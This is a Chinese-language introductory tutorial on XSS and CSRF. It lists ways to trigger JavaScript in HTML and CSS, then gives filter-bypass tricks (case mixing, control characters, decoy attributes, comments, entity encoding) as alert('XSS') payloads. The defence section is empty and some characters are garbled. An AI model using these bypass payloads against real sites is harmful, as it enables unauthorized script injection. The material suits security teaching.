Xss Csrf 簡介

一、Js在web的執行環境

1.直接觸發

?在HTML頁中插入<script></script>腳本標記。JS嵌入到HTML中的兩種方式：

?1）直接嵌入<script>標簽

?<script language=“javascript”>

?document.write(“hello world!”);

?</script>

?2）在外部以js文件的形式嵌入

<script language=“javascript” src=“test.js”>

</script>

2.利用HTML標簽屬性觸發

?利用HTML標簽中能夠訪問文件的屬性來執行JS代碼。JS中包含一個URL偽協議，可以使用javascript:加上任意JS代碼來表示一個URL，瀏覽器裝載此URL時，JS被執行。

< img src=“javascript:alert(‘XSS’)” />

< img dynsrc=“javascript:alert(‘XSS’)” />

?

3.?利用HTML事件觸發

?HTML標簽中定義了一系列事件。

<img src=“#” οnerrοr=“alert(‘XSS’)” />

<img onClick =“alert(‘XSS’)” />

4?利用CSS觸發

lCSS嵌入HTML中的三種方式：

1)以.css文件的形式:

<link href=“test.css” rel=“stylesheet” type=“text/css”/>

2)以<style></style>標簽的方式:

< style type="text/javascript">alert('XSS');</ style >?

3）在標簽中以style屬性的方式。

<a style ="background-image: url(javascript:alert('XSS'))">? </a>

5?其他

IE支持在CSS中使用expression，用來把CSS和JS結合起來，即CSS后跟一段JS代碼，CSS屬性的值等于JS代碼的執行結果:

<style>

h1{color:#CCC;height:expression(alert(‘xss’));}

</style>

二、Xss的介紹

三、XSS挖掘技巧

?過濾規則：1.關鍵字過濾：如：javascript等；2.<>等特殊字符轉碼。

1.但是HTML并不遵循XHTML標準，所以可以將HTML標簽屬性值大小寫、混合寫，而且標簽屬性可以單引號、雙引號，也可以不用引號：如：

??? <img src=“javascript:alert(‘XSS’)” />

??? 寫為<img src=“JavasCripT:alert(‘XSS’)” />可繞過過濾規則

2.插入控制符的ASCII碼混淆，不影響原代碼的執行。如tab(&#9)、換行符號(&#10)、回車符(&#13)等31個控制字符。

???? 如： <img src=“javascript:alert(‘XSS’)” />，混淆后代碼為：

???????? <img src=“&#15;javascript:alert(‘XSS’)” />

3. 繞過HTML標簽內的關鍵字過濾，在插入代碼的屬性前加入混淆屬性，如： <img src=“abc>” οnclick=“alert(‘XSS’)” />

4. 插入注釋符如: <img style=“xss:expr/*xss*/ession(alert(111))”>

5.對CSS：\會被瀏覽器忽略： : <img style=“background-image:url(ja\vas\\\\cript:alert(111))”>

6.編碼繞過，如： <img src=“&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#4l&#59”>等價于<img src=“javascript:alert(‘xss’;)”.>

????? http://ha.ckers.org/xss.html

四、防XSS

五、跨站請求偽造(CSRF)

某些瀏覽器允許跨域攜帶cookies。如：

在a.com訪問b.com時，會攜帶B.com的cookies

例如火狐瀏覽器